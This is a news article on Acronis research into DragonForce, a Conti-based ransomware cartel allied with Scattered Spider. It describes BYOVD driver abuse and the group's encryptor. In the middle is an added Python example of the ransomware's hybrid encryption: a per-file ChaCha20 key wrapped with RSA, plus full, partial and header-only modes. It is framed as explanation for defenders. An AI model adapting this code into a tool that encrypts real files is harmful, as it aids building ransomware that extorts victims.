Acronis researchers uncover the growing reach of DragonForce, a Conti-based ransomware cartel that is reshaping cybercrime through affiliate collaboration and advanced attack tactics.
Quick Summary – TLDR:
- DragonForce rebranded as a ransomware cartel, offering affiliates infrastructure, profit-sharing and branding freedom.
- Scattered Spider joined the cartel, enabling high-profile attacks including one on Marks & Spencer.
- The cartel uses vulnerable drivers (BYOVD) to kill security software and encrypt systems undetected.
- Over 200 victims have been exposed, highlighting DragonForce’s rising dominance in the ransomware ecosystem.
What Happened?
DragonForce, a ransomware group that emerged in 2023, rebranded itself as a cartel in early 2025, moving beyond the traditional Ransomware-as-a-Service (RaaS) model. The new model offers affiliates profit incentives, infrastructure support and full control over branding, while forming alliances with notorious cybercriminals like Scattered Spider. The combined threat has already impacted major enterprises including Marks & Spencer and Harrods.
🚨NEW: Acronis Threat Research Unit (TRU) analyzed recent activity linked to the DragonForce ransomware group and identified a new malware variant in the wild.
Active since 2023, DragonForce, a Conti-derived ransomware-as-a-service, has rebranded into a ransomware cartel,… pic.twitter.com/DL6lWimq7m
— Acronis (@Acronis) November 4, 2025
The Rise of DragonForce
DragonForce began as a typical RaaS group using leaked LockBit 3.0 and Conti v3 source code to create its ransomware payloads. However, what sets DragonForce apart is its strategic shift to a cartel-style model, recruiting affiliates with attractive offers like 80 percent of the ransom profits, custom encryptors and access to its leak infrastructure.
Affiliates are allowed to white-label payloads and run operations under their own branding. This has led to the emergence of variants like Devman and Mamona (later renamed Global), both of which use DragonForce’s builder tools but apply unique configurations and file extensions.
Alliance with Scattered Spider
One of the group’s most notable moves has been its collaboration with Scattered Spider, a highly skilled access broker known for phishing, SIM swapping and multi-factor authentication (MFA) bypass techniques. Together, they orchestrated attacks on high-profile targets, such as UK retailer Marks & Spencer.
Scattered Spider uses sophisticated social engineering methods including:
- Reconnaissance on employee roles and access levels.
- Phishing and vishing to gain login credentials.
- SIM swapping and MFA fatigue to bypass authentication.
- Deployment of remote monitoring tools like TeamViewer and AnyDesk.
- Use of AWS Systems Manager Inventory for deeper network exploration.
Once inside, they provide access for DragonForce to deploy ransomware across Windows, Linux and ESXi systems, leading to full-scale data encryption and extortion.
Technical Power: BYOVD Attacks and Encryption
DragonForce distinguishes itself with advanced techniques such as Bring Your Own Vulnerable Driver (BYOVD) attacks. It loads legitimately signed but vulnerable drivers such as truesight.sys and rentdrv2.sys and abuses their kernel privileges to terminate EDR and antivirus processes, so that encryption proceeds with the host's security tooling already blinded and the window for detection and response sharply reduced.
Its encryptor uses ChaCha20 for file contents, generating a unique ChaCha20 key for every file and wrapping that key with an embedded RSA public key, so that files cannot be recovered without the operator's RSA private key; this mirrors the core behavior of the original Conti source code. DragonForce also added encrypted configuration files to hide its parameters and reduce forensic visibility.
Key features include:
- Full, partial and header-only encryption modes.
- File extension customization.
- Targeted process termination (including SQL, Outlook, antivirus apps).
- Obfuscation using ADVObfuscator (although with occasional plaintext leakage).
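To make the hybrid scheme and the three encryption modes concrete, here is an added example written for this page (not DragonForce or Conti code, and not from the Acronis analysis) that applies the construction to in-memory byte strings: a fresh ChaCha20 key per file, wrapped with an RSA public key, and full, partial and header-only range selection. ChaCha20 is implemented in pure Python from RFC 8439 so the block runs without third-party packages; the RSA pair is a toy built from two fixed Mersenne primes with textbook unpadded RSA, chosen only so the example is self-contained, and the header length, chunk size and stride defaults are assumptions rather than DragonForce's real values.

```python
import os
import struct

MASK32 = 0xFFFFFFFF


def _rotl32(v, n):
    return ((v << n) | (v >> (32 - n))) & MASK32


def _quarter_round(s, a, b, c, d):
    s[a] = (s[a] + s[b]) & MASK32; s[d] = _rotl32(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = _rotl32(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK32; s[d] = _rotl32(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = _rotl32(s[b] ^ s[c], 7)


def chacha20_block(key, counter, nonce):
    """One 64-byte ChaCha20 keystream block (RFC 8439), pure Python for portability."""
    init = struct.unpack("<16I", b"expand 32-byte k" + key + struct.pack("<I", counter) + nonce)
    s = list(init)
    for _ in range(10):  # 10 double rounds = 20 rounds
        _quarter_round(s, 0, 4, 8, 12); _quarter_round(s, 1, 5, 9, 13)
        _quarter_round(s, 2, 6, 10, 14); _quarter_round(s, 3, 7, 11, 15)
        _quarter_round(s, 0, 5, 10, 15); _quarter_round(s, 1, 6, 11, 12)
        _quarter_round(s, 2, 7, 8, 13); _quarter_round(s, 3, 4, 9, 14)
    return struct.pack("<16I", *((x + y) & MASK32 for x, y in zip(init, s)))


def chacha20_xor(key, nonce, data, counter):
    """XOR data with keystream starting at block `counter`; encrypt and decrypt are the same op."""
    out = bytearray(len(data))
    for off in range(0, len(data), 64):
        ks = chacha20_block(key, counter + off // 64, nonce)
        for i, b in enumerate(data[off:off + 64]):
            out[off + i] = b ^ ks[i]
    return bytes(out)


# Toy RSA pair from two fixed Mersenne primes, textbook (unpadded) RSA: illustration only.
# A real encryptor embeds only (RSA_E, RSA_N); RSA_D stays with the operator.
RSA_P, RSA_Q, RSA_E = 2**127 - 1, 2**521 - 1, 65537
RSA_N = RSA_P * RSA_Q
RSA_D = pow(RSA_E, -1, (RSA_P - 1) * (RSA_Q - 1))


def rsa_wrap(file_key, e=RSA_E, n=RSA_N):
    return pow(int.from_bytes(file_key, "big"), e, n)


def rsa_unwrap(wrapped, d=RSA_D, n=RSA_N):
    return pow(wrapped, d, n).to_bytes(32, "big")


def encrypt_ranges(size, mode, header_len=4096, chunk=1 << 20, stride=8 << 20):
    """Byte ranges each mode touches (defaults are assumed values). Offsets stay 64-byte
    aligned so a range starting at `start` can use keystream block start//64 without
    any two ranges sharing keystream (which would be a two-time pad)."""
    if header_len % 64 or chunk % 64 or stride % 64 or stride < chunk:
        raise ValueError("header_len, chunk and stride must be multiples of 64, stride >= chunk")
    if mode == "full":
        return [(0, size)]
    if mode == "header":
        return [(0, min(header_len, size))]
    if mode == "partial":
        return [(off, min(off + chunk, size)) for off in range(0, size, stride)]
    raise ValueError(f"unknown mode {mode!r}")


def encrypt_blob(plaintext, mode, **range_opts):
    """Hybrid scheme from the text: fresh ChaCha20 key per file, wrapped with the RSA public key."""
    file_key, nonce = os.urandom(32), os.urandom(12)
    buf = bytearray(plaintext)
    for start, end in encrypt_ranges(len(buf), mode, **range_opts):
        buf[start:end] = chacha20_xor(file_key, nonce, bytes(buf[start:end]), start // 64)
    # A real encryptor appends wrapped key + nonce + mode as a file footer; returned here instead.
    return bytes(buf), rsa_wrap(file_key), nonce


def decrypt_blob(ciphertext, wrapped_key, nonce, mode, d=RSA_D, **range_opts):
    """Only the holder of RSA_D can unwrap the per-file key: there is no universal decryptor."""
    file_key = rsa_unwrap(wrapped_key, d)
    buf = bytearray(ciphertext)
    for start, end in encrypt_ranges(len(buf), mode, **range_opts):
        buf[start:end] = chacha20_xor(file_key, nonce, bytes(buf[start:end]), start // 64)
    return bytes(buf)
```

Two things the code makes visible that the list above does not: the partial and header-only modes trade completeness for speed, so in those modes most of each file's bytes remain in plaintext and can be carved during triage even though the file is unusable as-is; and because every file has its own wrapped key, recovering one file key (for example from process memory during the attack) helps with that file only.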
Following public exposure of vulnerabilities in Akira's encryption on Habr, DragonForce quickly patched its own code to avoid similar scrutiny. This adaptability shows its focus on maintaining technical superiority and operational security.
The Cartel’s Expansion and Power Plays
DragonForce has moved aggressively to establish dominance, including:
- Defacing rival ransomware sites, such as BlackLock.
- Attempting a hostile takeover of RansomHub infrastructure.
- Attracting fleeing affiliates from competing groups.
Over 200 victims have appeared on DragonForce’s leak site since late 2023, across industries like retail, airlines, insurance and managed service providers. This surge is a direct result of their cartel-like expansion model and growing affiliate base.
SQ Magazine Takeaway
I think DragonForce’s move from a typical ransomware group to a cartel is one of the boldest plays we’ve seen in recent cybercrime. They’re not just building malware; they’re building a franchise. By giving affiliates powerful tools and the freedom to brand themselves, DragonForce is creating a cybercrime “ecosystem” that’s scalable, hard to trace and incredibly dangerous. Add in Scattered Spider’s surgical precision in gaining access, and this alliance becomes a serious threat to global cybersecurity. If companies aren’t stepping up their defenses now, they’re already behind.
